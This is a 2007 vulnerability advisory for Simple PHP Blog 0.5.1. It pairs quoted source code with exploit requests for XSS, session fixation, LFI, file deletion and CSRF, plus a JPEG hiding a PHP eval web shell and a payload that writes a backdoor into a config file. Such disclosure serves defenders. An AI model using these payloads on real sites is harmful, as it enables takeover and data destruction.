Title: Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities Vendor: http://sourceforge.net/projects/sphpblog/ Advisory: http://acid-root.new.fr/?0:15 Author: DarkFig < gmdarkfig (at) gmail (dot) com > Released on: 2007/10/21 Changelog: ---------- L M H T Summary: Ip Spoofing [X] [_] [_] [X] Cross Site Scripting [X] [_] [_] [X] Session Fixation [X] [_] [_] [X] mail() CRLF Injection [X] [_] [_] [_] Local File Inclusion (+CSRF) [_] [X] [_] [X] File Deletion (+CSRF) [_] [X] [_] [X] File Upload Vulnerability [_] [_] [X] [X] Code Execution (+CSRF) [_] [_] [X] [X] Legend: L - Low risk M - Medium risk H - High risk T - Tested Risk level: Medium / High CVE: ---------- I - IP SPOOFING The file "scripts/sb_communicate.php" contains the following code: 19| function getIP() { 20| if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) { 21| $ip = $_SERVER[ 'HTTP_CLIENT_IP' ]; 22| } 23| else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) { 24| $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; 25| } 26| else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) { 27| $ip = $_SERVER[ 'REMOTE_ADDR' ]; 28| } 29| else if ( getenv( "HTTP_CLIENT_IP" ) ) { 30| $ip = getenv( "HTTP_CLIENT_IP" ); 31| } 32| else if ( getenv( "HTTP_X_FORWARDED_FOR" ) ) { 33| $ip = getenv( "HTTP_X_FORWARDED_FOR" ); 34| } 35| else if ( getenv( "REMOTE_ADDR") ) { 36| $ip = getenv( "REMOTE_ADDR" ); 37| } 38| else { 39| $ip = "UNKNOWN"; 40| } 41| return( $ip ); 42| } So, an attacker can spoof his IP, he just have to create an HTTP packet, add a special header, and send it. The HTTP packet will look's like this: GET /index.php HTTP/1.1\r\n Host: localhost\r\n X-Forwarded-For: 127.0.0.1\r\n Connection: keep-alive\r\n\r\n Later, we'll see how to gain the administrator's session id. Even if we got the good session id, there is a protection that "normally" don't permit to be logged in. Let's see a part of the file "scripts/sb_login.php": 28| // Check if user is logged in. 29| if ( isset( $_SESSION[ 'logged_in' ] ) && | $_SESSION[ 'logged_in' ] == 'yes' ) { | 30| if ( $_SESSION[ 'site_path' ] === | dirname($_SERVER[ 'PHP_SELF' ]) ) { | 31| if ( $_SESSION[ 'ip' ] === getIP() ) { 32| // User is logged in. 33| return ( true ); 34| } 35| } 36| } Thanks to the getIP() function, if we know the administrator's IP (later we'll see how to get it easily), we can bypass the third condition. II - CROSS SITE SCRIPTING When a guest add a comment, an HTTP packet is sent to "comment_add_cgi.php". Before writing the comment into a file, there is some conditions, the first condition is that the IP sent with the POST method, must be the same as the IP returned by the getIP() function. Let's see the code: 88| if ($ok) { 89| // Verify that posted IP and actual IP matches. 90| if ( getIP() === $_POST['user_ip'] ) { 91| $ipMatches = true; 92| } else { 93| $ipMatches = false; 94| $ok = false; 95| $error_message = $lang_string[ 'error_no_match' ]; 96| } 97| } This is useless, I don't know what the author wanted to do but this can be bypassed easily. After some conditions, the write_comment() function is called: 219| $result = write_comment( $_POST[ 'y' ], $_POST[ 'm' ], | $_POST[ 'entry' ], 220| $comment_name, 221| $comment_email, 222| $comment_url, 223| $comment_text, 224| $_POST[ 'user_ip' ], 225| $moderationFlag, 226| time() ); This function is situated in "scripts/sb_comments.php". Let's see the data which will be stored in a file: 519| // Save the file 520| $save_data = array(); 521| $save_data[ 'VERSION' ] = $sb_info[ 'version' ]; 522| $save_data[ 'NAME' ] = clean_post_text( $comment_name ); 523| $save_data[ 'DATE' ] = $comment_date; 524| $save_data[ 'CONTENT' ] = sb_parse_url( clean_post_text( $comment_text ) ); | 525| if ( $comment_email != '' ) { 526| $save_data[ 'EMAIL' ] = clean_post_text( $comment_email ); 527| } | 528| if ( $comment_url != '' ) { 529| $save_data[ 'URL' ] = clean_post_text( $comment_url ); 530| } | 531| $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8 532| $save_data[ 'MODERATIONFLAG' ] = $hold_flag; 533| 534| // Implode the array 535| $str = implode_with_keys( $save_data ); 536| 537| // Save the file 538| $result = sb_write_file( $entryFile, $str ); The clean_post_text() function protect against XSS, it also replace a string separator (by its html equivalent) which is used when comment's data are extracted. This function is in the file "scripts/sb_formatting.php": 13| function clean_post_text( $str ) { 14| // Cleans post text input. 15| // 16| // Strip out and replace pipes with colons. HTML-ize entities. 17| // Use charset from the language file to make sure we're only 18| // encoding stuff that needs to be encoded. 19| // 20| // This makes entries safe for saving to a file (since the data 21| // format is pipe delimited.) 22| global $lang_string; 23| $str = str_replace( '|', '|', $str ); 24| $str = @htmlspecialchars( $str, ENT_QUOTES, $lang_string[ 'php_charset' ] ); 25| 26| return ( $str ); 27| } The clean_post_text() function isn't applied to the IP address which will be stored in the file. So this can be exploited to conduct XSS attack. The attacker will send an HTTP packet like this one: POST /comment_add_cgi.php HTTP/1.1\r\n Host: localhost\r\n Client-IP: \r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 229\r\n\r\n y=07&m=07&entry=entry070727-161718&comment_name=HereMyName &comment_email=&comment_url=&user_ip= &style_dropdown=--&comment_text=This+is+an+example+comment. &comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\r\n The sender IP address can be only seen by a registered user. So the code sent by the attacker will be executed when a registered user will see the comments page. III - SESSION FIXATION In a session fixation attack, the attacker have to set the victim's session id. In our case, the attacker fix the user's session id, the victim which is logged in, will get logged out when the cookie will be set, then if the victim try to log in, the session id will be registered on the server. Let's see a part of the logged_in() function: 11| function logged_in ( $redirect_to_login, $redirect_to_setup ) { 12| 13| // Turn off URL SIDs. 14| ini_set('url_rewriter.tags',''); 15| ini_set('session.use_trans_sid', false); 16| 17| // Init the session. 18| session_set_cookie_params(60*60*24*5); 19| 20| // Check if the user has a client-side cookie. 21| if ( isset( $_COOKIE[ 'sid' ] ) ) { 22| session_id($_COOKIE[ 'sid' ]); 23| } 24| 25| // Start the session. 26| session_start (); 27| 28| // Check if user is logged in. 29| if ( isset( $_SESSION[ 'logged_in' ] ) && | $_SESSION[ 'logged_in' ] == 'yes' ) { | 30| if ( $_SESSION[ 'site_path' ] === | dirname($_SERVER[ 'PHP_SELF' ]) ) { | 31| if ( $_SESSION[ 'ip' ] === getIP() ) { 32| // User is logged in. 33| return ( true ); 34| } 35| } 36| } After, the attacker, who knows the session id, just have to use it to be logged in as the victim's account. But in our case, he must also know the victim's IP. I'll demonstrate how to get administrator rights even if the victim has a protection against XSS (NoScript Firefox plugin for example). First, the attacker will fix the victim's session id by setting a cookie to the victim. Then he'll also force the victim's web browser to establish a connexion to a script that will get the victim's IP. Take a look at this schema: +----------------------------------------------------------+ | The attacker post a comment using the XSS vulnerability. | | The code which will be executed on the client browser | | will set the "sid" cookie, it will also force the | | victim's web browser to send an HTTP packet to a script | | that will mail the victim's IP to the attacker. | +----------------------------------------------------------+ | | +---------------------------------------------------+ +--> | | | | +---------------------------------------------------+ | +-------------------------------------------------+ | | The victim, which is logged in, have to see the | <--+ | comments page. After saw it, the victim will be | | logged out. | +-------------------------------------------------+ | | +------------------------------------------+ +--> | The victim try to log in. Now that she's | | logged in, the session id set by the | | attacker is registered on the server. | +------------------------------------------+ | +--------------------------------------------+ | | Now the attacker just have to send an HTTP |<--+ | packet which contains the session id and a | | special header with the victim's IP. | | The attacker is logged in as the victim's | | account. | +--------------------------------------------+ As you can see, even if the victim is protected against XSS, it's always possible to get adminitrator rights with this type of attack, we juste use the "meta" and "img" tags. IV - MAIL() CRLF INJECTION User's variables are not checked before be used in the mail() function. The file "comment_add_cgi.php" call the write_comment() function with the following parameters: 214| $comment_name = sb_stripslashes($_POST['comment_name']); 215| $comment_email = sb_stripslashes($_POST['comment_email']); 216| $comment_url = sb_stripslashes($_POST['comment_url']); 217| $comment_text = sb_stripslashes($_POST['comment_text']); 218| 219| $result = write_comment($_POST[ 'y' ],$_POST[ 'm' ], | $_POST['entry' ], 220| $comment_name, 221| $comment_email, 222| $comment_url, 223| $comment_text, 224| $_POST[ 'user_ip' ], 225| $moderationFlag, 226| time() ); Then the function clean_post_text() is applied to $comment_email. But this function doesn't protect against CRLF Injection, this will not replace the \r and \n chars. Take a look at the file "sb_comments.php": 471| function write_comment($y,$m,$entry,$comment_name,$comment_email | 525| if ( $comment_email != '' ) { 526| $save_data[ 'EMAIL' ] = clean_post_text( $comment_email ); 527| } | 584| // Send the Email 585| if ( array_key_exists( 'EMAIL', $save_data ) ) { 586| sb_mail( $save_data[ 'EMAIL' ], $blog_config[ 'blog_email' ], | $subject, $body, false ); 587| } The goal of the sb_mail() function is to send mass emails. As you can see belows, there is no protection against $save_data[ 'EMAIL' ]. 45| function sb_mail ($from, $to, $subject, $body, $text=true, $priority=3) { | 69| $headers .= 'From: ' . $from . " \r\n"; 70| $headers .= 'Reply-To: ' . $from . " \r\n"; 71| $headers .= 'Return-Path: ' . $from . " \r\n"; | 76| ini_set('sendmail_from', $from); 77| for ( $j=0; $j < count($to_array); $j++ ) { 78| $result = mail( $to_array[$j], sb_stripslashes($subject), | sb_stripslashes($body), $headers ); 79| } 80| ini_restore('sendmail_from'); So an attacker can perform a CRLF injection attack into the mail() function, it will probably be used by spammers. V - LOCAL FILE INCLUSION (+CSRF) There is an LFI vulnerability (admin rights needed) in the file "languages_cgi.php": 76| if ( array_key_exists( 'store_data', $_GET ) ) { 77| 78| // Store all the data from language 2 79| require_once('languages/' . $_GET[ 'lang2' ] . '/strings.php'); This will require magic_quotes_gpc=Off. Because they use the GET method, there's a CSRF vulnerability too. For each new comments, a new text file is created. The structure of the file like this: VERSION|0.4.8 |NAME| |DATE|1188078694 |CONTENT| |EMAIL| |IP-ADDRESS| |MODERATIONFLAG|H Now imagine that an attacker use the XSS vulnerability to post php code and html tags which will make the admin sent an HTTP request to exploit the LFI vuln. The XSS code will look's like this: /languages_cgi.php?store_data=1&lang2= ../content/07/07/entry070727-161718/comments/comment070825-235134.txt%00> In order to exploit this, the attacker must know where the new file will be created. Let's see the code: 471| function write_comment ( $y, $m, $entry, $comment_name, | $comment_email, $comment_url, $comment_text, $user_ip, | $hold_flag='', $comment_date=null ) { | 478| $basedir = 'content/'; 479| $dir = $basedir.$y.'/'.$m.'/'.$entry; | 494| $dir .= '/comments'; | 506| $dir .= '/'; | 512| $stamp = date('ymd-His'); 513| if ( $blog_config[ 'blog_enable_gzip_txt' ] ) { 514| $entryFile = $dir.'comment'.$stamp.'.txt.gz'; 515| } else { 516| $entryFile = $dir.'comment'.$stamp.'.txt'; 517| } The variables $y, $m and $entry are sent with the HTTP request. The filename is decided with the date() function. There is many ways for know the content returned by $stamp: - Ask the server by sending an HTTP request (the "Date" header). - Bruteforce the path (Add several html tags). - Divide our attack in two parts (filenames are displayed in the html source). The attacker must also urlencode the content of his XSS, the HTTP packet will finally look's like this: POST /comment_add_cgi.php HTTP/1.1 Host: localhost Connection: keep-alive Cookie: PHPSESSID= Client-IP: Content-Type: application/x-www-form-urlencoded Content-Length: y=&m=&entry=&comment_name=Hacker &comment_email=my%40you.com&comment_url=&user_ip= &style_dropdown=--&comment_text=Hello&comment_capcha =128619&submit=%A0Post+Comment%A0 Now the attacker have to wait until the admin see his comment. VI - FILE DELETION (+CSRF) There is a CSRF vulnerability which can lead to file deletion. Let's see the code of "trackback_delete_cgi.php": 22| if ( array_key_exists( 'trackback', $_GET ) ) { 23| $ok = delete_trackback( $_GET[ 'trackback' ] ); 24| } So if the variable "trackback" is set with the GET method, the delete_trackback() function is called. The code of this function is situated in "sb_trackback.php": 229| function delete_trackback ( $entryFile ) { 230| // Delete the old file 231| if ( file_exists( $entryFile ) ) { 232| $ok = sb_delete_file( $entryFile ); 233| } If the file exists, the function sb_delete_file() is called, with the parameter $_GET['trackback']. The source code of this function is situated in the file "sb_fileio.php": 171| function sb_delete_file ( $filename ) { | 175| clearstatcache(); 176| if ( file_exists( $filename ) ) { 177| $result = @unlink( $filename ); 178| } There is no verification before deleting the file. So we can delete any files on the server. The HTTP packet sent by the attacker will look's like this: GET /trackback_delete_cgi.php?trackback= HTTP/1.1\r\n Host: localhost\r\n Connection: keep-alive\r\n\r\n Admin right's are needed to delete files, but because it's also a CRLF vulnerability, we can use it in our XSS, then so admin right's aren't needed for the attacker. VII - FILE UPLOAD VULNERABILITY When we're admin, we can upload emoticons. Let'see the content of the function upload_emoticons() which is situated in the file "emoticons.php": 36| function upload_emoticons() { 37| // Emoticon upload form results 38| $path = 'images/emoticons'; 39| $uploaddir = $path; 40| 41| $ok = false; 42| if ( $_FILES[ 'user_emot' ][ 'error' ] == 0 ) { 43| if (!file_exists($uploaddir)) { 44| $oldumask = umask(0); 45| @mkdir($uploaddir, 0777 ); 46| @umask($oldumask); 47| } 48| 49| $uploaddir .= '/'; 50| $uploadfile = $uploaddir. | preg_replace("/ /","_",$_FILES[ 'user_emot' ][ 'name' ]); 51| 52| if (@is_uploaded_file($_FILES['user_emot']['tmp_name'])) { | 53| if (@getimagesize($_FILES['user_emot']['tmp_name']) == FALSE){ 54| $ok = -1; | 55| } else { | 56| if (@move_uploaded_file($_FILES['user_emot']['tmp_name'], $uploadfile)){ 57| chmod( $uploadfile, 0777 ); 58| $ok = true; 59| } As you can see, there is only one protection against file upload vulnerability. The function getimagesize() will return FALSE if the upload file isn't a valid image file. But we can bypass this easily. Take a look at this: C:\>edjpgcom img1x1.jpg C:\>hexdump img1x1.jpg ff d8 ff e0 00 10 4a 46 - 49 46 00 01 01 01 00 60 ......JF IF...... 00 60 00 00 ff db 00 43 - 00 08 06 06 07 06 05 08 .......C ........ 07 07 07 09 09 08 0a 0c - 14 0d 0c 0b 0b 0c 19 12 ........ ........ 13 0f 14 1d 1a 1f 1e 1d - 1a 1c 1c 20 24 2e 27 20 ........ ........ 22 2c 23 1c 1c 28 37 29 - 2c 30 31 34 34 34 1f 27 ......7. .01444.. 39 3d 38 32 3c 2e 33 34 - 32 ff db 00 43 01 09 09 9.82..34 2...C... 09 0c 0b 0c 18 0d 0d 18 - 32 21 1c 21 32 32 32 32 ........ 2...2222 32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32 22222222 22222222 32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32 22222222 22222222 32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 ff fe 22222222 222222.. 00 26 3c 3f 70 68 70 20 - 65 76 61 6c 28 24 5f 53 ....php. eval...S 45 52 56 45 52 5b 48 54 - 54 50 5f 53 48 45 4c 4c ERVER.HT TP.SHELL 5d 29 3b 20 3f 3e ff c0 - 00 11 08 00 01 00 01 03 ........ ........ 01 22 00 02 11 01 03 11 - 01 ff c4 00 1f 00 00 01 ........ ........ 05 01 01 01 01 01 01 00 - 00 00 00 00 00 00 00 01 ........ ........ 02 03 04 05 06 07 08 09 - 0a 0b ff c4 00 b5 10 00 ........ ........ 02 01 03 03 02 04 03 05 - 05 04 04 00 00 01 7d 01 ........ ........ 02 03 00 04 11 05 12 21 - 31 41 06 13 51 61 07 22 ........ 1A..Qa.. 71 14 32 81 91 a1 08 23 - 42 b1 c1 15 52 d1 f0 24 q.2..... B...R... 33 62 72 82 09 0a 16 17 - 18 19 1a 25 26 27 28 29 3br..... ........ 2a 34 35 36 37 38 39 3a - 43 44 45 46 47 48 49 4a .456789. CDEFGHIJ 53 54 55 56 57 58 59 5a - 63 64 65 66 67 68 69 6a STUVWXYZ cdefghij 73 74 75 76 77 78 79 7a - 83 84 85 86 87 88 89 8a stuvwxyz ........ 92 93 94 95 96 97 98 99 - 9a a2 a3 a4 a5 a6 a7 a8 ........ ........ a9 aa b2 b3 b4 b5 b6 b7 - b8 b9 ba c2 c3 c4 c5 c6 ........ ........ c7 c8 c9 ca d2 d3 d4 d5 - d6 d7 d8 d9 da e1 e2 e3 ........ ........ e4 e5 e6 e7 e8 e9 ea f1 - f2 f3 f4 f5 f6 f7 f8 f9 ........ ........ fa ff c4 00 1f 01 00 03 - 01 01 01 01 01 01 01 01 ........ ........ 01 00 00 00 00 00 00 01 - 02 03 04 05 06 07 08 09 ........ ........ 0a 0b ff c4 00 b5 11 00 - 02 01 02 04 04 03 04 07 ........ ........ 05 04 04 00 01 02 77 00 - 01 02 03 11 04 05 21 31 ......w. .......1 06 12 41 51 07 61 71 13 - 22 32 81 08 14 42 91 a1 ..AQ.aq. .2...B.. b1 c1 09 23 33 52 f0 15 - 62 72 d1 0a 16 24 34 e1 ....3R.. br....4. 25 f1 17 18 19 1a 26 27 - 28 29 2a 35 36 37 38 39 ........ ...56789 3a 43 44 45 46 47 48 49 - 4a 53 54 55 56 57 58 59 .CDEFGHI JSTUVWXY 5a 63 64 65 66 67 68 69 - 6a 73 74 75 76 77 78 79 Zcdefghi jstuvwxy 7a 82 83 84 85 86 87 88 - 89 8a 92 93 94 95 96 97 z....... ........ 98 99 9a a2 a3 a4 a5 a6 - a7 a8 a9 aa b2 b3 b4 b5 ........ ........ b6 b7 b8 b9 ba c2 c3 c4 - c5 c6 c7 c8 c9 ca d2 d3 ........ ........ d4 d5 d6 d7 d8 d9 da e2 - e3 e4 e5 e6 e7 e8 e9 ea ........ ........ f2 f3 f4 f5 f6 f7 f8 f9 - fa ff da 00 0c 03 01 00 ........ ........ 02 11 03 11 00 3f 00 f7 - fa 28 a2 80 3f ff d9 d9 ........ ........ C:\>ren img1x1.jpg backdoor.php The created file is a valid jpg image, so the check made by the function getimagesize() will be bypassed. And so the backdoor will be uploaded in "images/emoticons". VIII - CODE EXECUTION (+CSRF) There is a CSRF vulnerability which can lead to execute PHP code, this is the critical point of this script. Let's see the code of the file "manage_users.php": 61| if ( $_GET[ 'action' ] == "update" ) { | 63| if ($_SESSION[ 'fulladmin' ] != 'yes' ) { 64| echo($lang_string['fulladminerror']); 65| } else { 66| 67| // First read and remove the offending line 68| $pfile = fopen("config/users.php","a+"); 69| rewind($pfile); | 70| while (!feof($pfile)) { 71| $line = fgets($pfile); 72| $tmp = explode('|', $line); 73| 74| if ( $_GET[ 'type' ] == "edit" ) { 75| if ( $tmp[1] != $_GET[ 'user' ] ) | { $newfile = $newfile . $line; } 76| } else { 77| $newfile = $newfile . $line; 78| } 79| } 80| fclose($pfile); | 101| $blankfield = ""; 102| 103| // Create the record structure 104| if ( $_GET[ 'type' ] == "edit" ) { | 107| $password = $_GET[ 'oldpasshash' ]; 108| if ( $password != $_POST[ 'sPassword' ] ) { 109| $password = crypt($_GET[ 'user' ],$_POST[ 'sPassword' ] ); 110| } 111| 112| $array = | array($_POST[ 'sFullname' ], $_GET[ 'user' ], $password, | $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ], | $modcomments, $deleteentries, $editany, $blankfield); | 113| } else { | 114| $array = | array($_POST[ 'sFullname' ], $_POST[ 'sUsername' ], | crypt( $_POST[ 'sUsername' ], $_POST[ 'sPassword' ] ), | $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ], | $modcomments, $deleteentries, $editany, $blankfield); 115| } | 116| $str = implode('|', $array); 117| $newfile = $newfile . $str . "n"; | 120| $pfile = fopen("config/users.php","w"); 121| fwrite($pfile, $newfile); 122| fclose($pfile); 123| 124| redirect_to_url("manage_users.php"); 125| } 126| } As you can see there is no protection against PHP chars (like strip_tags()) before inserting user's data into the php file. But the author of the script add a ".htaccess" file in the "config" directory. Let's see the content of this file: 1| IndexIgnore * 2| 3| 4| order allow,deny 5| deny from all 6| 7| 8| 9| order allow,deny 10| deny from all 11| So we can't list the content of the directory, and we don't have access to .htaccess/.txt files. But we can access to .php files ! This require admin rights... but we can write PHP code with the GET method, that's why there's also a CSRF vulnerability. In our example we will take this php code (as you can see we don't need magic_quote_gpc=Off): 1| So the attacker just have to post (using the XSS) something like this: /manage_users.php?action=update &type=edit&user=%3C%3Fphp%0D%0A%0D%0Aif%28isset%28%24 _GET%5Bmail%5D%29%29%0D%0A%7B%0D%0A%24mail+%3D+%3C%3C %3CMAIL%0D%0Ahacker%40you.com%0D%0AMAIL%3B%0D%0A%0D%0 A%24subject+%3D+%3C%3C%3CSUBJ%0D%0AHey+%21%0D%0ASUBJ% 3B%0D%0A%0D%0A%24body+%3D+%3C%3C%3CBODY%0D%0ACode+exe cuted%0D%0ABODY%3B%0D%0A%0D%0Amail%28%24mail%2C%24sub ject%2C%24body%29%3B%0D%0A%7D%0D%0Aelse+eval%28%24_SE RVER%5BHTTP_SHELL%5D%29%3B%0D%0A%0D%0A%3F%3E> /config/users.php?mail=1> /trackback_delete_cgi.php?track back=MY_COMMENT_FILENAME> After, he have to wait until the admin see his comment. Then the HTTP request will be sent to the script, and so the PHP code will be written into "config/users.php". IX - END As you can see there's some pretty cool things here: - [III] We bypass Noscript firefox plugin protection. We don't use any